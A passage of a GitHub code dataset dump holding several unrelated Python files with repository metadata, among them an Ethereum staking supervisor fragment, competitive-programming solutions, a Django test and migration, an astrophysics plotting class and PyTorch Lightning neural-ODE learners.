beacon node\n \"\"\"\n try:\n index = next(\n i for i, port_map in enumerate(self._beacon_node_port_maps)\n if port_map.host_id == (host, port)\n )\n except StopIteration:\n raise UnknownNode(f\"{host}:{port}\")\n\n port_map = self._beacon_node_port_maps.pop(index)\n self._beacon_node_port_maps.insert(0, port_map)\n\n async def _create_validator_for_release(self, release: ValidatorRelease) -> ValidatorRunner:\n log_path = self.config.validator_log_path(release.impl_name)\n return await create_validator_for_release(\n release,\n self.eth2_network,\n self.config.fee_recipient,\n self._validator_canonical_dir,\n out_log_filepath=log_path,\n err_log_filepath=log_path,\n beacon_node_ports=self._beacon_node_port_maps,\n container_name=self._validator_container_name,\n )\n","repo_name":"jimpo/eth-staking","sub_path":"supervisor/validator_supervisor/supervisor.py","file_name":"supervisor.py","file_ext":"py","file_size_in_byte":20464,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"71595579764","text":"h,w,n=map(int,input().split())\nal=[]\nbl=[]\nfor _ in range(n):\n a,b=map(int,input().split())\n al.append(a)\n bl.append(b)\nsa={a:i for i,a in enumerate(sorted(list(set(al))),start=1)}\nsb={b:j for j,b in enumerate(sorted(list(set(bl))),start=1)}\nans_a=[]\nans_b=[]\nfor a in al:\n ans_a.append(sa[a])\nfor b in bl:\n ans_b.append(sb[b])\nfor a,b in zip(ans_a,ans_b):\n print(a,b)\n","repo_name":"ymsk-sky/atcoder","sub_path":"abc213/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72397824564","text":"import fileloader as fl\n\n# ============ NAIVE IMPLEMENTATION =========\n# def minusOne(val):\n# return val - 1\n\n# def step(t, state):\n# numBirths = 0\n\n# reduced = list(map(minusOne, state))\n# for i in range(len(reduced)):\n# if reduced[i] == -1:\n# numBirths += 1\n# reduced[i] = 6\n\n# nextState = reduced + ([8] * numBirths)\n\n# return nextState\n\n# def main():\n# runs = 256\n\n# data = fl.loadLines('./day6/input.txt')\n# inputList = data[0].split(',')\n# inputList = list(map(int, inputList))\n\n# fish = inputList\n\n# for t in range(runs):\n# fish = step(t, fish)\n\n# print(\"NUM FISH:\", len(fish))\n# ===========================================\n\ndef step(t, list):\n births = list.pop(0)\n list[6] += births\n list.append(births)\n\n return list\n\ndef processInput(inputList):\n output = [0] * 9\n\n for i in range(len(inputList)):\n output[int(inputList[i])] += 1\n\n return output\n\n\ndef main():\n runs = 256\n\n data = fl.loadLines('./day6/input.txt')\n inputList = data[0].split(',')\n inputBucketList = processInput(inputList)\n # inputList = list(map(int, inputList))\n print(inputBucketList)\n\n fish = inputBucketList\n\n for t in range(runs):\n fish = step(t, fish)\n\n print(\"NUM FISH:\", sum(fish))\n # print(\"NUM FISH:\", len(fish))\n\nif __name__ == \"__main__\":\n main()","repo_name":"Kolossion/advent-of-code-2021","sub_path":"day6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73615653364","text":"# 2981 검문\n\nimport math\n\n\ndef gcd(a, b):\n return b if a % b == 0 else gcd(b, a % b)\n\n\nN = int(input())\nlst = [int(input()) for _ in range(N)]\nM = set()\nlst.sort()\n\nn = lst[1] - lst[0]\nfor i in range(2, N):\n n = gcd(n, lst[i] - lst[i - 1])\n\nM.add(n)\n\nfor i in range(2, int(math.sqrt(n)) + 1):\n if n % i == 0:\n M.add(i)\n M.add(n // i)\n\nM = sorted(M)\nfor i in M:\n print(i, end=' ')\n","repo_name":"y2sec/Algorithm","sub_path":"Baekjoon/2981_Problem.py","file_name":"2981_Problem.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38691598203","text":"from datetime import datetime\n\nimport ddt\nfrom celery.states import FAILURE\nfrom django.core.management import call_command\nfrom django.core.management.base import CommandError\n\nfrom lms.djangoapps.instructor_task.models import InstructorTask, QUEUING\nfrom lms.djangoapps.instructor_task.tests.factories import InstructorTaskFactory\nfrom lms.djangoapps.instructor_task.tests.test_base import InstructorTaskTestCase\n\n\n@ddt.ddt\nclass TestFailOldQueueingTasksCommand(InstructorTaskTestCase):\n \"\"\"\n Tests for the `fail_old_queueing_tasks` management command\n \"\"\"\n\n def setUp(self):\n super(TestFailOldQueueingTasksCommand, self).setUp()\n\n type_1_queueing = InstructorTaskFactory.create(\n task_state=QUEUING,\n task_type=\"type_1\",\n task_key='',\n task_id=1,\n )\n type_1_non_queueing = InstructorTaskFactory.create(\n task_state='NOT QUEUEING',\n task_type=\"type_1\",\n task_key='',\n task_id=2,\n )\n\n type_2_queueing = InstructorTaskFactory.create(\n task_state=QUEUING,\n task_type=\"type_2\",\n task_key='',\n task_id=3,\n )\n self.tasks = [type_1_queueing, type_1_non_queueing, type_2_queueing]\n\n def update_task_created(self, created_date):\n \"\"\"\n Override each task's \"created\" date\n \"\"\"\n for task in self.tasks:\n task.created = datetime.strptime(created_date, \"%Y-%m-%d\")\n task.save()\n\n def get_tasks(self):\n \"\"\"\n After the command is run, this queries again for the tasks we created\n in `setUp`.\n \"\"\"\n type_1_queueing = InstructorTask.objects.get(task_id=1)\n type_1_non_queueing = InstructorTask.objects.get(task_id=2)\n type_2_queueing = InstructorTask.objects.get(task_id=3)\n return type_1_queueing, type_1_non_queueing, type_2_queueing\n\n @ddt.data(\n ('2015-05-05', '2015-05-07', '2015-05-06'),\n ('2015-05-05', '2015-05-07', '2015-05-08'),\n ('2015-05-05', '2015-05-07', '2015-05-04'),\n )\n @ddt.unpack\n def test_dry_run(self, after, before, created):\n \"\"\"\n Tests that nothing is updated when run with the `dry_run` option\n \"\"\"\n self.update_task_created(created)\n call_command(\n 'fail_old_queueing_tasks',\n dry_run=True,\n before=before,\n after=after,\n )\n\n type_1_queueing, type_1_non_queueing, type_2_queueing = self.get_tasks()\n self.assertEqual(type_1_queueing.task_state, QUEUING)\n self.assertEqual(type_2_queueing.task_state, QUEUING)\n self.assertEqual(type_1_non_queueing.task_state, 'NOT QUEUEING')\n\n @ddt.data(\n ('2015-05-05', '2015-05-07', '2015-05-06', FAILURE),\n ('2015-05-05', '2015-05-07', '2015-05-08', QUEUING),\n ('2015-05-05', '2015-05-07', '2015-05-04', QUEUING),\n )\n @ddt.unpack\n def test_tasks_updated(self, after, before, created, expected_state):\n \"\"\"\n Test that tasks created outside the window of dates don't get changed,\n while tasks created in the window do get changed.\n Verifies that non-queueing tasks never get changed.\n \"\"\"\n self.update_task_created(created)\n\n call_command('fail_old_queueing_tasks', before=before, after=after)\n\n type_1_queueing, type_1_non_queueing, type_2_queueing = self.get_tasks()\n self.assertEqual(type_1_queueing.task_state, expected_state)\n self.assertEqual(type_2_queueing.task_state, expected_state)\n self.assertEqual(type_1_non_queueing.task_state, 'NOT QUEUEING')\n\n def test_filter_by_task_type(self):\n \"\"\"\n Test that if we specify which task types to update, only tasks with\n those types are updated\n \"\"\"\n self.update_task_created('2015-05-06')\n call_command(\n 'fail_old_queueing_tasks',\n before='2015-05-07',\n after='2015-05-05',\n task_type=\"type_1\",\n )\n type_1_queueing, type_1_non_queueing, type_2_queueing = self.get_tasks()\n self.assertEqual(type_1_queueing.task_state, FAILURE)\n # the other type of task shouldn't be updated\n self.assertEqual(type_2_queueing.task_state, QUEUING)\n self.assertEqual(type_1_non_queueing.task_state, 'NOT QUEUEING')\n\n @ddt.data(\n ('2015-05-05', None),\n (None, '2015-05-05'),\n )\n @ddt.unpack\n def test_date_errors(self, after, before):\n \"\"\"\n Test that we get a CommandError when we don't supply before and after\n dates.\n \"\"\"\n with self.assertRaises(CommandError):\n call_command('fail_old_queueing_tasks', before=before, after=after)\n","repo_name":"risualSupport/edx-platform2-dev","sub_path":"lms/djangoapps/instructor_task/management/commands/tests/test_fail_old_queueing_tasks.py","file_name":"test_fail_old_queueing_tasks.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6565121815","text":"#!/usr/bin/env python\nimport aiml\nk = aiml.Kernel()\nk.learn(\"learningFileList.aiml\")\nk.respond(\"LEARN AIML\")\nwhile True:\n reply = k.respond(input(\"User > \"))\n if reply:\n print(\"bot > \", reply)\n else:\n print(\"bot > :) \", )\n","repo_name":"chaninou/appa","sub_path":"chatbot/conversation.py","file_name":"conversation.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2794920033","text":"######## API ##########################################\n\n# Module\n# $ pip install -U Flask-SQLAlchemy\nimport json\nfrom flask import request\nfrom . import create_app, database\nfrom .models import wordtable\nfrom flask import redirect, url_for\n\n# Flask 객체 생성 \napp = create_app()\n\n# CRUD\n## get\n@app.route('/result', methods=['GET'])\ndef read():\n wordbooks = database.get_all(wordtable)\n all_wordtable = []\n for words in wordbooks:\n new_wordbook = {\n \"id\": words.id,\n \"word\": words.word,\n \"area\": words.area,\n \"mean\": words.mean1\n }\n\n all_wordtable.append(new_wordbook)\n return json.dumps(all_wordtable), 200\n\n## POST METHOD\n@app.route('/add', methods = ['POST'])\ndef add():\n\n # 데이터 요청\n word = request.form['word']\n area = request.form['area']\n mean = request.form['mean']\n\n database.add_instance(wordtable, word=word, area=area, mean=mean)\n return redirect('result') # 1. 주소이동 redirect('url명') 2. 함수로 이동 redirect(url_for('함수명'))\n\n\n\n\n\n\n########### 최소단위 flask app ####################\n\n# @app.route(\"/\")\n# def hello_world():\n# return \"

Hello, World!

\"\n\n# @app.route(\"/\")\n# def hello(name):\n# return f\"Hello, {escape(name)}!\"\n\n############ 라우팅 ################################\n\n# @app.route('/')\n# def index():\n# return 'Index Page'\n\n# @app.route('/hello')\n# def hello():\n# return 'Hello, World'\n\n############# 라우팅 변수 규칙 #####################\n\n# @app.route(\"/\")\n# def hello(name):\n# return f\"Hello, {escape(name)}\"\n\n# @app.route('/user/')\n# def show_user_profile(username):\n# # show the user profile for that user\n# return f'User {escape(username)}'\n\n# @app.route('/post/')\n# def show_post(post_id):\n# # show the post with the given id, the id is an integer\n# return f'Post {post_id}'\n\n# @app.route('/path/')\n# def show_subpath(subpath):\n# # show the subpath after /path/\n# return f'Subpath {escape(subpath)}'\n\n\n############### url 후행 슬래쉬 ######################\n# url 후행 슬래쉬 없으면, 좀 더 고유한 url\n\n# @app.route('/projects/') # 후행슬래쉬 있든없든 모두 동작\n# def projects():\n# return 'The project page'\n\n# @app.route('/about') # 후행슬래쉬 없을 때만 동작\n# def about():\n# return 'The about page'\n\n################ URL Building : url_for() ################\n# from flask import url_for\n\n# @app.route('/')\n# def index():\n# return 'index'\n\n# @app.route('/login')\n# def login():\n# return 'login'\n\n# @app.route('/user/')\n# def profile(username):\n# return f'{username}\\'s profile'\n\n# # url 확인방법 - print문으로 각 함수에 해당하는 url 표시\n# with app.test_request_context():\n# print(url_for('index'))\n# print(url_for('login'))\n# print(url_for('login', next='/'))\n# print(url_for('profile', username='John Doe'))\n\n################ HTTP method #################################\n# 방법1 ---------------------------------\n# from flask import request\n\n# def do_the_login():\n# return \"do the login\"\n\n# def show_the_login_form():\n# return \"id , pw\"\n\n# @app.route('/login', methods=['GET', 'POST'])\n# def login():\n# if request.method == 'POST':\n# return do_the_login()\n# else:\n# return show_the_login_form()\n\n# 방법 2------------------------------------\n# @app.get('/login')\n# def login_get():\n# return show_the_login_form()\n\n# @app.post('/login')\n# def login_post():\n# return do_the_login()\n\n###################### Static Files(정적 파일)###################\n# that’s usually where the CSS and JavaScript files are coming from\n\n","repo_name":"minsoo-s/Self_Study","sub_path":"t3q-Infra/mission-3tier-app/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18420487121","text":"import numpy as np\nimport os\nimport sys\nimport matplotlib.pyplot as plt\nimport datetime\nfrom functools import reduce\n\nfrom quasarscan.preprocessing import parse_metadata\nfrom quasarscan.utils import roman,ion_lists\nfrom quasarscan.utils.utils import sort_ions,reversearray\nfrom quasarscan.utils.variable_lists import stringcriteria,intensives,intensiveslabels,\\\n sightline_xVars,param_xVars,\\\n sightline_unit_labels,param_unit_labels,\\\n all_known_variables\nfrom quasarscan.plotting.quasar_array_handler import QuasarArrayHandler\nfrom quasarscan.plotting import var_labels_interpreter,\\\n plot_data_processor,\\\n errorbar_processor,\\\n matplotlib_interfacer\n\n#these are a number of global lists and dictionaries which are checkedvariable_lists against in various places\n\nclass BadPlotError(Exception):\n def __init__(self,message):\n self.message = message\n print(self.message)\n\nclass MultiQuasarSpherePlotter():\n #summary: initialize mq and load all data\n #\n #inputs: loadonly: if not 'all' only load certain simulations (e.g. 'VELA')\n # loadobs: if not 'all' only load certain simulations (e.g. 'COS-Halos') [I'm not sure this works]\n # textfiles: usually None. Could give a specific list of textfiles to use if you don't want to search here\n # cleanup: delete textfiles that fail safety check (will ask user permission first)\n # plots: default plots value to use. Will default to mean if not given\n # throwErrors: if true, throw errors when reading textfiles if broken. If false, skip ones that create errors\n # safetycheck: if False, skip safetychecks and just use whatever you load\n #\n #outputs: MultiQuasarSpherePlotter object, usually called 'mq'\n def __init__(self, loadsim = \"all\",loadobs = 'all',loadempty = 'none',average = 'median'):\n self.defaultaverage = average\n self.quasar_array_handler = QuasarArrayHandler(loadsim,loadobs,loadempty)\n\n #summary: print length of list of QuasarSpheres\n #\n #inputs: None\n #\n #outputs: length of currentQuasarArray\n def length(self,include_nonsims=False):\n return self.quasar_array_handler.length(include_nonsims)\n\n def list_all_quasar_spheres(self,*criteria,qtype='sim',log=False):\n self.quasar_array_handler.list_all_quasar_spheres(*criteria,qtype=qtype,log=log)\n\n def get_qlist(self,qtype='sim'):\n return self.quasar_array_handler.get_qlist(qtype)\n \n #summary: cancel all constraints\n #\n #inputs: None\n # \n #outputs: None, changes state of mq.currentQuasarArray and mq.currentQuasarArrayName\n def reset_current_quasar_array(self):\n self.quasar_array_handler.reset_current_quasar_array()\n \n #summary: splits currentQuasarArray into particular bins, either calculated on the fly or given\n #\n #inputs: criteria: what criteria to constrain by (simname, simnum, Mvir, Rvir, SFR, \n # etc. See 'quasar_sphere.py' for full list)\n # bins: a list of n numbers, which determine n-1 bins in between them. If string param, n strings which each\n # constitute a bin\n # atEnd: if True, compare values by their final (z=1 or z=minimum among remaining values) value, \n # not the current one\n # splitEven: a number of bins to split into. The bins will be chosen so each has the same number of members.\n # **kwargs: onlyNonempty,reverse ['postprocess_sorted']\n # \n #outputs: labels: list of strings for labelling points in legend\n # bins: the bins to compare to \n # quasarBins: list of lists of quasarSphere objects that fit in the bins\n # obsBins: list of lists of observationalQuasarSphere objects that fit in the bins\n # \n # NOTE: These are usually combined together and considered an 'lq' object, passed directly \n # into most plots (any except type 0) general use case is e.g.\n # >>>lq = mq.sort_by('Mvir',[0,10**11,np.inf])\n # >>>mq.plot_err('O VI',lq=lq)\n def sort_by(self, criteria, bins = [0,np.inf],at_end = False,split_even = False,reverse=False,**kwargs):\n return self.quasar_array_handler.sort_by(criteria,bins,at_end,split_even,reverse,**kwargs)\n\n def sort_by_2D(self, criteria_x,criteria_y, bins_x = [0,np.inf],bins_y = [0,np.inf],\\\n at_end_x = False,at_end_y = False,split_even_x = False,split_even_y = False,\\\n reverse_x = False,reverse_y = False,**kwargs):\n return self.quasar_array_handler.sort_by_2D(criteria_x,criteria_y, bins_x,bins_y,at_end_x,at_end_y,\\\n split_even_x,split_even_y,reverse_x,reverse_y,**kwargs)\n\n #summary: restricts to only quasarspheres with galaxy parameters within certain limits\n #\n #inputs: constrainCriteria: what criteria to constrain by (simname, simnum, Mvir, Rvir, SFR, \n # etc. See 'quasar_sphere.py' for full list)\n # bins: either a list of two numbers, if a numerical criteria, or several strings if string criteria\n # can leave as None if splitEven is used\n # **kwargs: changeArrayName, exclude ['change_array_name']\n # splitEven,atEnd,set_main_array,sortobs ['constrain_array_helper']\n # \n #outputs: return the bins used (in the case of 'low' or 'high' for example it'll tell you the cutoff)\n def constrain_current_quasar_array(self, constrain_criteria,bins=None,qtype='all',**kwargs):\n return self.quasar_array_handler.constrain_current_quasar_array(constrain_criteria,bins,qtype,**kwargs)\n \n def plot_err(self,yVar,xVar='rdivR',qtype = 'sim',average = 'default',force_averaging = False,**kwargs):\n average = self.defaultaverage if average == 'default' else average\n average = 'scatter' if qtype == 'obs' and not force_averaging else average\n plot_type,xVar_packet,yVar_packet,labels,filter_for = var_labels_interpreter.configure_variables(xVar,yVar,average,**kwargs)\n unfiltered_qlist = self.quasar_array_handler.impose_requirements(filter_for,qtype)\n xlabel,ylabel,title_final = var_labels_interpreter.get_labels_and_titles(plot_type,xVar_packet,yVar_packet,average,**kwargs)\n quasar_array = var_labels_interpreter.decide_quasar_array(qtype,self.quasar_array_handler.get_qlist(qtype),**kwargs)\n xarys,yarys = plot_data_processor.get_xy_vals(plot_type,xVar_packet,yVar_packet,quasar_array,**kwargs)\n if qtype == 'sim' or force_averaging:\n xs,ys,xerrs,yerrs,empty = errorbar_processor.get_sim_errs(plot_type,xVar_packet,yVar_packet,xarys,yarys,average = average,**kwargs)\n if not empty:\n to_return = matplotlib_interfacer.plot_sim_on_ax(plot_type, xs, ys, xerrs, yerrs, xlabel, ylabel, labels, title_final, **kwargs) \n elif qtype == 'obs':\n xs,ys,empty = errorbar_processor.process_scatter_points(xVar_packet,yVar_packet,xarys,yarys,**kwargs)\n xerrs,yerrs = errorbar_processor.handle_scatter_errs(xVar_packet,yVar_packet,quasar_array)\n if not empty:\n to_return = matplotlib_interfacer.plot_obs_on_ax(plot_type, xs, ys, xerrs, yerrs, xlabel, ylabel, labels, title_final, quasar_array, **kwargs)\n elif qtype == 'empty':\n assert plot_type == 3\n xs,ys,empty = errorbar_processor.process_scatter_points(xVar_packet,yVar_packet,xarys,yarys,**kwargs)\n xerrs,yerrs = None,None\n if not empty:\n to_return = matplotlib_interfacer.plot_sim_on_ax(plot_type, xs, ys, xerrs, yerrs, xlabel, ylabel, labels, title_final, **kwargs)\n if empty:\n to_return = None,None\n self.quasar_array_handler.update_qlist(qtype,unfiltered_qlist)\n return to_return\n\n def plot_scatter(self,yVar,xVar='rdivR',qtype = 'sim',**kwargs):\n plot_type,xVar_packet,yVar_packet,labels,filter_for = var_labels_interpreter.configure_variables(xVar,yVar,'scatter',**kwargs)\n unfiltered_qlist = self.quasar_array_handler.impose_requirements(filter_for,qtype)\n xlabel,ylabel,title = var_labels_interpreter.get_labels_and_titles(plot_type,xVar_packet,yVar_packet,'scatter',**kwargs)\n quasar_array = var_labels_interpreter.decide_quasar_array(qtype,self.quasar_array_handler.get_qlist(qtype),**kwargs)\n xarys,yarys = plot_data_processor.get_xy_vals(plot_type,xVar_packet,yVar_packet,quasar_array,**kwargs)\n xs,ys,empty = errorbar_processor.process_scatter_points(xVar_packet,yVar_packet,xarys,yarys,**kwargs)\n if qtype == 'obs':\n xerrs,yerrs = errorbar_processor.handle_scatter_errs(xVar_packet,yVar_packet,quasar_array)\n if not empty:\n to_return = matplotlib_interfacer.plot_obs_on_ax(plot_type, xs, ys, xerrs, yerrs, xlabel, ylabel, labels, title, quasar_array, **kwargs)\n elif qtype in ['sim','empty']:\n xerrs,yerrs = None,None\n if not empty:\n to_return = matplotlib_interfacer.plot_scatter_on_ax(plot_type, xs, ys, xlabel, ylabel, labels, title, **kwargs)\n if empty:\n to_return = None,None\n self.quasar_array_handler.update_qlist(qtype,unfiltered_qlist)\n return to_return\n\n def plot_hist(self,yVar,xVar='rdivR',qtype = 'sim',**kwargs):\n if qtype != 'sim':\n raise BadPlotError('can only plot simulation sightlines for plot_hist')\n plot_type,xVar_packet,yVar_packet,labels,filter_for = var_labels_interpreter.configure_variables(xVar,yVar,'scatter',**kwargs)\n assert plot_type in [1,2], \"'plot_hist' can only plot one continuous variable against one discrete variable\"\n unfiltered_qlist = self.quasar_array_handler.impose_requirements(filter_for,qtype)\n xlabel,ylabel,title = var_labels_interpreter.get_labels_and_titles(plot_type,xVar_packet,yVar_packet,'hist',**kwargs)\n quasar_array = var_labels_interpreter.decide_quasar_array('sim',self.quasar_array_handler.get_qlist('sim'),**kwargs)\n xarys,yarys = plot_data_processor.get_xy_vals(plot_type,xVar_packet,yVar_packet,quasar_array,**kwargs)\n xs,ys,weight,cbarlabel,empty = errorbar_processor.process_xy_vals_hist(xVar_packet,yVar_packet,xarys,yarys,**kwargs)\n if not empty:\n to_return = matplotlib_interfacer.plot_hist_on_ax(plot_type, xs, ys, xlabel, ylabel, title, weight, cbarlabel, **kwargs)\n else:\n to_return = None,None\n self.quasar_array_handler.update_qlist(qtype,unfiltered_qlist)\n return to_return\n\n def faberplot(self,yVar,xVar='rdivR',plot_kind='err',lq2=None,qtype='sim',lq=None,fig = None, axes = None,figsize='guess',sharex=True,sharey=True,\\\n **kwargs):\n #after using sort_by_2d to get a set of labels and a 2d array of quasarspheres,\n #ask plot_err or plot_hist for completed plots of type given, for \n #quasars in that cell of quasarArray, put them in subplots of a n by m subplots object\n #and show that plot\n if lq2 is None:\n raise BadPlotError('required to use sort_by_2D before plotting a faberplot')\n fig,axes = matplotlib_interfacer.setup_faberplot_subplots(lq2,fig,axes,figsize,sharex,sharey)\n old_quasar_array = self.quasar_array_handler.get_qlist(qtype)\n quasar_array = lq2[4][self.quasar_array_handler.get_qtype_index(qtype)]\n for i,axlist in enumerate(axes):\n for j,ax in enumerate(axlist):\n self.quasar_array_handler.update_qlist(qtype,quasar_array[i][j])\n if lq is not None:\n lq = self.sort_by(lq[3],lq[1],**kwargs)\n lq = [None]*len(lq[0]) if i>0 or j>0 else lq[0],lq[1],lq[2],lq[3]\n if plot_kind=='err':\n self.plot_err(yVar, xVar=xVar, qtype=qtype, fig = fig,ax = ax, lq=lq, **kwargs)\n elif plot_kind=='scatter':\n self.plot_scatter(yVar, xVar=xVar, qtype=qtype, fig = fig,ax = ax, lq=lq, **kwargs)\n elif plot_kind=='hist':\n self.plot_hist(yVar, xVar=xVar, qtype=qtype, fig = fig,ax = ax, **kwargs)\n matplotlib_interfacer.handle_faberplot_titles(i,j,axes,lq2)\n self.quasar_array_handler.update_qlist(qtype,old_quasar_array)\n return fig,axes\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"claytonstrawn/quasarscan","sub_path":"quasarscan/plotting/multi_quasar_sphere_plotter.py","file_name":"multi_quasar_sphere_plotter.py","file_ext":"py","file_size_in_byte":12675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"12504894743","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Item',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('active', models.BooleanField(default=True)),\n ('purchased', models.BooleanField(default=True)),\n ('amount', models.PositiveIntegerField(default=0)),\n ('created_at', models.DateTimeField(default=datetime.datetime.now, editable=False)),\n ('modified_at', models.DateTimeField(default=datetime.datetime.now, editable=False, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Product',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('active', models.BooleanField(default=True)),\n ('quantity', models.PositiveIntegerField(default=0, blank=True)),\n ('measure', models.CharField(blank=True, max_length=3, choices=[(b'kg', b'Kilogramos'), (b'l', b'Litros')])),\n ('created_at', models.DateTimeField(default=datetime.datetime.now, editable=False)),\n ('modified_at', models.DateTimeField(default=datetime.datetime.now, editable=False, blank=True)),\n ],\n ),\n migrations.AddField(\n model_name='item',\n name='product',\n field=models.ForeignKey(to='product.Product'),\n ),\n ]\n","repo_name":"rbenvos/BuyIt","sub_path":"BuyIt_Backend/apps/product/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3672317400","text":"###\r\n#\r\n#\r\n#\r\n# Program Description : Base class for all Notebooks in the GUI\r\n# Created By : Benjamin Kleynhans\r\n# Creation Date : May 28, 2019\r\n# Authors : Benjamin Kleynhans\r\n#\r\n# Last Modified By : Benjamin Kleynhans\r\n# Last Modified Date : August 29, 2019\r\n# Filename : gui_notebook.py\r\n#\r\n###\r\n\r\n# Imports\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nimport pdb\r\n\r\nclass Gui_Notebook():\r\n\r\n # Main Gui Frame constructor\r\n def __init__(self, root, master, notebook_name):\r\n\r\n self.root = root\r\n\r\n self.notebook_name = notebook_name\r\n\r\n self.create_gui_notebook(master)\r\n\r\n\r\n # Create the actual Frame\r\n def create_gui_notebook(self, master):\r\n\r\n self.gui_notebook = ttk.Notebook(master)\r\n\r\n # Create notebook container to easily access notebooks from other areas in the gui\r\n self.notebooks = {}\r\n self.gui_notebook.notebooks = self.notebooks\r\n\r\n # Create frame container to easily access frames from other areas in the gui\r\n self.frames = {}\r\n self.gui_notebook.frames = self.frames\r\n\r\n # Create widgets container to easily access widgets from other areas in the gui\r\n self.widgets = {}\r\n self.gui_notebook.widgets = self.widgets\r\n\r\n # Create widgets container to easily access widgets from other areas in the gui\r\n self.canvases = {}\r\n self.gui_notebook.canvases = self.canvases\r\n\r\n # Create toolbar container to easily access toolbars from other areas in the gui\r\n self.toolbars = {}\r\n self.gui_notebook.toolbars = self.toolbars\r\n\r\n # Create window container to easily access windows from other areas in the gui\r\n self.windows = {}\r\n self.gui_notebook.windows = self.windows\r\n\r\n self.root.classes[self.notebook_name] = self\r\n self.root.notebooks[self.notebook_name] = self.gui_notebook\r\n master.notebooks[self.notebook_name] = self.gui_notebook","repo_name":"bkleynhans/PyMono","sub_path":"gui/forms/base_classes/gui_notebook.py","file_name":"gui_notebook.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29244891099","text":"import torch\nimport torch.nn as nn\nimport torch.utils.data as data\nimport pytorch_lightning as pl\n\nclass ClassificationLearner(pl.LightningModule):\n def __init__(self, \n X_data: torch.Tensor, \n y_data: torch.Tensor,\n t_span:torch.Tensor, \n model:nn.Module):\n\n super().__init__()\n self.model, self.t_span = model, t_span\n self.X_data = X_data\n self.y_data = y_data\n \n def forward(self, x):\n return self.model(x)\n \n def training_step(self, batch, batch_idx):\n import pdb; pdb.set_trace();\n x, y = batch \n t_eval, y_hat = self.model(x, self.t_span)\n y_hat = y_hat[-1] # select last point of solution trajectory\n loss = nn.CrossEntropyLoss()(y_hat, y)\n return {'loss': loss} \n \n def configure_optimizers(self):\n return torch.optim.Adam(self.model.parameters(), lr=0.01)\n\n def train_dataloader(self):\n\n X = self.X_data\n yn = self.y_data\n\n X_train = torch.Tensor(X)\n y_train = torch.LongTensor(yn.long())\n \n train = data.TensorDataset(X_train, y_train)\n trainloader = data.DataLoader(train, batch_size=len(X), shuffle=True)\n\n return trainloader\n\n\nclass TrajectoryLearner(pl.LightningModule):\n def __init__(self, \n datamodule: pl.LightningDataModule,\n model:pl.LightningModule):\n\n super().__init__()\n\n self.model = model\n self.datamodule = datamodule\n\n self.save_hyperparameters(ignore=['model'])\n \n def forward(self, x, t):\n\n batch_size, _, _ = x.size()\n x_hat = torch.zeros_like(x)\n t_spans = torch.zeros(batch_size, 2)\n\n for bat in range(batch_size):\n batch_times = t[bat].squeeze()\n t_spans[bat,0] = batch_times[0]\n t_spans[bat,1] = batch_times[-1]\n\n #Assuming the NeurlODE class is using model(x,t) and not model.trajectory(x,t):\n _, x_out = self.model(x[bat].squeeze(), t_spans[bat])\n\n x_hat[bat] = x_out[-1]\n\n return x_hat, t_spans\n \n def training_step(self, batch, batch_idx):\n x, t = batch\n\n #NeuralODE model handles single sample operations,\n #so batch the data in here:\n\n x_hat, _ = self.forward(x,t)\n\n #loss: difference between true trajectory\n #and the evolved Neural ODE trajectory\n mse = nn.MSELoss()\n loss = mse(x_hat, x)\n\n self.log_dict(\n {\n \"train_loss\": loss,\n }\n )\n\n return loss \n\n def validation_step(self, batch, batch_idx):\n\n x, t = batch \n \n #NeurlODE model handles single sample operations,\n #so batch the data in here:\n\n x_hat, _ = self.forward(x,t)\n\n #import pdb; pdb.set_trace();\n\n #loss: difference between true trajectory\n #and the evolved Neural ODE trajectory\n mse = nn.MSELoss()\n loss = mse(x_hat, x)\n\n self.log_dict(\n {\n \"val_loss\": loss,\n }\n )\n\n return loss\n \n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.model.parameters(), lr=0.01)\n\n return optimizer\n\n def train_dataloader(self):\n return self.datamodule.train_dataloader()\n\n def val_dataloader(self):\n return self.datamodule.val_dataloader()\n\n def test_dataloader(self):\n return self.datamodule.test_dataloader()","repo_name":"j0n18/NeuroEvolutionaryODEs","sub_path":"NEODEs/learners.py","file_name":"learners.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"20374105070","text":"# Ashur Motlagh\n# 018319910\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport random\n\ndef SSonConIntervals(N, mu, sig, n):\n NGD = np.random.normal(mu, sig, N) # Normal Gaussian\n\n mean = [] # initializing list\n topof95 = []\n 